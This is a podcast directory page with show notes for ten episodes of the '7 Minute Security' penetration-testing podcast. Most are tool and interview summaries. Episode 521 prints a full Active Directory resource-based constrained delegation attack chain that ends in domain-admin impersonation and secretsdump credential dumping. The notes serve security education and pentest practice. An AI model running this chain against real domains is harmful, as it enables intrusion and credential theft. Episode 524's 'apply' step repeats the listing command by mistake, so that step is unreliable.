TopPodcast.com
Menu
  • Home
  • Top Charts
  • Top Networks
  • Top Apps
  • Top Independents
  • Top Podfluencers
  • Top Picks
    • Top Business Podcasts
    • Top True Crime Podcasts
    • Top Finance Podcasts
    • Top Comedy Podcasts
    • Top Music Podcasts
    • Top Womens Podcasts
    • Top Kids Podcasts
    • Top Sports Podcasts
    • Top News Podcasts
    • Top Tech Podcasts
    • Top Crypto Podcasts
    • Top Entrepreneurial Podcasts
    • Top Fantasy Sports Podcasts
    • Top Political Podcasts
    • Top Science Podcasts
    • Top Self Help Podcasts
    • Top Sports Betting Podcasts
    • Top Stocks Podcasts
  • Podcast News
  • About Us
  • Podcast Advertising
  • Contact
Not in our directory?
Add Show Here
Podcast Equipment
Center

toppodcastlogoOur TOPPODCAST Picks

  • Comedy
  • Crypto
  • Sports
  • News
  • Politics
  • True Crime
  • Business
  • Finance

Follow Us

toppodcastlogoStay Connected

    View Top 200 Chart
    Back to Rankings Page
    News

    7 Minute Security

    7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

    Advertise

    Copyright: © Brian Johnson

    • Apple Podcasts
    • Google Play
    • Spotify

    Latest Episodes:
    7MS #530: Tales of Pentest Pwnage - Part 38 Jul 22, 2022
    Show notes

    Hey friends, we have another fun tale of pwnage for you today. I loved this one because I got to learn some new tools I hadn't used before, such as:

    • Get-InternalSubnets.ps1 - for getting internal subnets
    • Adalanche for grabbing Active Directory info (similar to SharpHound)

    This tool worked well for me with this syntax:

    adalanche-windows-x64-v2022.5.19.exe collect activedirectory --domain victim.domain --port=389 --tlsmode=NoTLS
    • Copernic Desktop Search for pillaging through shares with Google-like search capabilities!

    • PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions!

    • CeWL for creating awesome wordlists to crack with!

    I don't have a Toyota TRD Pro, but I can't stop watching this reel.


    7MS #529: Interview with Matthew Warner of Blumira Jul 15, 2022
    Show notes

    Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira. You might remember Matt from such podcasts as this one) when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11!

    Today, we talk about a cool report that Blumira put out called 2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including:

    • How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats?

    • Why open source detections are a great starting point - but not a magic bullet

    • Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend?

    • Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes?

    • Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block?

    • Common lateral movement tools/techniques

    • Why honeypots rule!


    7MS #528: Securing Your Family During and After a Disaster - Part 6 Jul 08, 2022
    Show notes

    In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for:

    • Do we have creds to log onto his computer?
    • How about his email accounts?
    • Do we have usernames/passwords for retirement accounts, bank accounts, etc.?
    • For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles?
    • Can we get into his phone to get key info off of text messages and grab phone #s of key contacts?
    • What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial?
    • Do we have redundancy in this plan, or is it all on paper in a file somewhere?

    7MS #527: First Impressions of Purple Knight Jul 01, 2022
    Show notes

    In today's episode we talk about Purple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in our Light Pentest LITE pentest training lab and did an informal compare-and-contrast of its detection capabilities versus PingCastle, which we talked about in depth in episode #489.


    7MS #526: Tales of Pentest Pwnage - Part 37 Jun 24, 2022
    Show notes

    Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO:

    • Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible!

    In regards to defending against secretsdump, this article I found this article to be super interesting.


    7MS #525: First Impressions of InsightIDR - Part 2 Jun 17, 2022
    Show notes

    Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks:

    • Active Directory enumeration via SharpHound

    • Password spraying through Rubeus

    • Kerberoasting and ASREPRoasting via Rubeus

    • Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi.

    • Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping.

    • Pass-the-hash attacks with CrackMapExec

    In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves:

    • Getting Started with Rapid7 InsightIDR: A SIEM Tutorial
    • Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

    7MS #524: How to Update VMWare ESXi From the Command Line Jun 10, 2022
    Show notes

    I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY

    Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates:

    1. List all upgrade profiles:
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
    1. Grep for just the ones you want (in my case ESXi 7.x):
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0
    1. Apply the one you want!
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0

    7MS #523: Local Administrator Password Solution - RELOADED! Jun 03, 2022
    Show notes

    Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017!

    Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go!

    (See the show notes for today's episode for more details!)


    7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2 May 27, 2022
    Show notes

    Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.


    7MS #521: Tales of Pentest Pwnage - Part 36 May 20, 2022
    Show notes

    Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD:

    # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN

    Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources.

    Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!


    Previous 1 20 21 22 23 24 75 Next

    Related Podcasts

    Inside Strategic Coach: Connecting Entrepreneurs With What Really Matters

    1

    Inside Strategic Coach: Connecting Entrepreneurs With What Really Matters Business
    WSJ Your Money Briefing

    2

    WSJ Your Money Briefing Business
    FORTUNE Unfiltered with Aaron Task

    3

    FORTUNE Unfiltered with Aaron Task Business
    FORTUNE OnStage Presents: The Most Powerful Women

    4

    FORTUNE OnStage Presents: The Most Powerful Women Business
    Slate Money

    5

    Slate Money Business
    In The Dark – The New Yorker

    6

    In The Dark – The New Yorker Business News
    footer-logo

    Contact Us

    Toll Free: 844-670-7747

    Links

    • Home
    • Top Charts
    • Networks
    • Apps
    • Independents Podcasts
    • Podcast Advertising
    • Podcast News
    • Contact Us
    • About Us
    • Analytics & Insights

    Stay Connected

      Privacy, Terms of Use & Our Code of Ethics Protecting Content Creators Copyrights